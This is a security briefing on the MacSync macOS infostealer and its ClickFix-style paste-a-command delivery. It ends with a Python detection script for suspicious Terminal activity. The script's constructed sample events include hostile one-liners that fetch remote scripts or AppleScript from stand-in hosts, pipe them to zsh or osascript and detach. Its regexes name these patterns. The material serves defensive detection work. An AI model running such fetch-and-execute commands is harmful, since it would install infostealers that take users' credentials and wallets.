What happened
The MacSync macOS infostealer is delivered through a ClickFix-style attack: victims are tricked into pasting a single command into the macOS Terminal, and the resulting script-based installation sidesteps the defenses that apply to packaged apps. The report describes MacSync as a low-cost malware-as-a-service infostealer targeting cryptocurrency users, discovered while investigating phishing infrastructure that mimicked Microsoft login pages. Victims are redirected to a fake cloud-storage installer page with step-by-step Terminal instructions; because the one-line command runs as a shell script rather than as a downloaded, signed app bundle, Gatekeeper and notarization checks never come into play. CloudSEK analysts were cited as having analyzed the infection chain, including a daemonized Zsh loader that detaches from the Terminal session and fetches a remote AppleScript payload. The malware was described as harvesting browser profiles and targeting cryptocurrency wallet browser extensions and desktop wallets such as Exodus, Electrum, and Bitcoin Core.
Who is affected
macOS users in cryptocurrency and fintech-adjacent communities are directly affected, especially those likely to follow “manual install” instructions on phishing pages. Organizations are indirectly affected when employee endpoints are compromised and browser credential stores or session cookies are harvested for reuse against corporate services.
Why CISOs should care
Script-driven "paste this command" infections bypass app reputation and packaging controls entirely, so the remaining control points are user behavior and endpoint scripting telemetry. Infostealers that capture browser cookies and saved credentials can translate into enterprise account compromise, persistence, and lateral movement without a conventional malware binary ever being installed.
3 practical actions
- Constrain scripting and Terminal abuse: Monitor and restrict suspicious shell execution patterns, in particular shells spawned from Terminal that fetch remote content and feed it straight to an interpreter (curl or wget piped into zsh/sh or wrapped in $(...)), commands that immediately background or nohup themselves, and unexpected osascript invocations.
- Increase endpoint detection for infostealers: Hunt for Zsh loaders that detach from their parent Terminal session, for newly created launchd agents or daemons that re-launch such scripts, and for outbound connections from scripting interpreters to newly registered domains.
- Reduce browser credential exposure: Enforce password managers, limit credentials and cookies stored in browser profiles on managed devices, and shorten session lifetimes for privileged users so that harvested cookies expire before they can be replayed.
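The detection logic the three actions above call for, as an added example (it is not code from the report or from CloudSEK). It scores constructed process-execution events of the kind an EDR or Endpoint Security client would emit; the field names, the weights, the threshold, and the example.invalid URLs are all assumptions, chosen to reflect the chain the page describes: a one-line command pasted into Terminal, a loader that fetches remote content and detaches from the session, and an AppleScript stage.

```python
"""Heuristic scoring of macOS process events for ClickFix-style Terminal infections.

Added example, not the report's or CloudSEK's detection content. Event field names,
indicator weights and the alert threshold are assumptions to be tuned against real telemetry.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str    # basename of the parent process image (assumed field)
    exe: str       # basename of the executed image (assumed field)
    cmdline: str   # command line as logged (assumed field)
    user: str = "user"


TERMINALS = {"Terminal", "iTerm2"}
SHELLS = {"zsh", "bash", "sh"}

FETCH = re.compile(r"\b(curl|wget)\b")
URL = re.compile(r"https?://[^\s'\"]+")
# Remote content handed straight to an interpreter: `curl ... | zsh`, `zsh -c "$(curl ...)"`, eval.
INTERP_SINK = re.compile(r"\|\s*(zsh|bash|sh|osascript)\b|\$\(\s*(curl|wget)\b|\beval\b")
# The command backgrounds or detaches itself from the terminal session.
DETACH = re.compile(r"\b(nohup|disown|setsid)\b|&\s*$|/dev/null\s*2>&1\s*&")
DECODE = re.compile(r"\bbase64\b.*(\s-d\b|\s-D\b|--decode)")

# Weights are illustrative: remote-fetch-to-interpreter is the strongest single signal,
# interactive-terminal origin alone is weak (every developer command line has it).
WEIGHTS = {
    "shell spawned directly by an interactive terminal": 1,
    "remote content fed straight to an interpreter": 2,
    "command detaches from the terminal session": 1,
    "AppleScript interpreter involved": 1,
    "inline base64 decoding": 1,
}
ALERT_THRESHOLD = 3


def analyze(ev: ProcEvent) -> tuple[int, list[str]]:
    """Return (score, reasons) for one process event."""
    cmd = ev.cmdline
    reasons = []
    if ev.parent in TERMINALS and ev.exe in SHELLS:
        reasons.append("shell spawned directly by an interactive terminal")
    if FETCH.search(cmd) and URL.search(cmd) and INTERP_SINK.search(cmd):
        reasons.append("remote content fed straight to an interpreter")
    if DETACH.search(cmd):
        reasons.append("command detaches from the terminal session")
    if ev.exe == "osascript" or re.search(r"\bosascript\b", cmd):
        reasons.append("AppleScript interpreter involved")
    if DECODE.search(cmd):
        reasons.append("inline base64 decoding")
    return sum(WEIGHTS[r] for r in reasons), reasons


def triage(events, threshold=ALERT_THRESHOLD):
    """Return [(event, score, reasons)] for events at or above the alert threshold."""
    hits = []
    for ev in events:
        score, reasons = analyze(ev)
        if score >= threshold:
            hits.append((ev, score, reasons))
    return hits


# Constructed sample telemetry (not captured data). Hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    # 0: ordinary developer activity
    ProcEvent("Terminal", "zsh", "brew update && brew upgrade"),
    # 1: a download that is saved, not executed
    ProcEvent("Terminal", "zsh", "curl -fsSL https://example.invalid/tool.tar.gz -o tool.tar.gz"),
    # 2: ClickFix-style one-liner: fetch, execute, nohup and background in one paste
    ProcEvent("Terminal", "zsh",
              'nohup zsh -c "$(curl -fsSL https://example.invalid/s.sh)" >/dev/null 2>&1 &'),
    # 3: second stage: a shell invokes osascript, which pulls and runs a remote AppleScript
    ProcEvent("zsh", "osascript",
              "osascript -e 'do shell script \"curl -fsSL https://example.invalid/p.scpt | osascript\"'"),
    # 4: benign backgrounding of a local dev server; scores below threshold by design
    ProcEvent("Terminal", "zsh", "python3 server.py > /dev/null 2>&1 &"),
]


if __name__ == "__main__":
    for ev, score, reasons in triage(SAMPLE_EVENTS):
        print(f"ALERT score={score} user={ev.user} parent={ev.parent} exe={ev.exe}")
        print(f"  cmd: {ev.cmdline}")
        for r in reasons:
            print(f"  - {r}")
```

Run as-is it alerts on events 2 and 3 only. Event 4 is the important edge case: backgrounding a process from Terminal is routine, so detachment on its own must not fire; it only counts once it is combined with a remote fetch into an interpreter or an osascript stage. In production the assumed fields map onto whatever your EDR exposes, and the weights should be tuned on a baseline of your own fleet's Terminal usage before the threshold is trusted.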
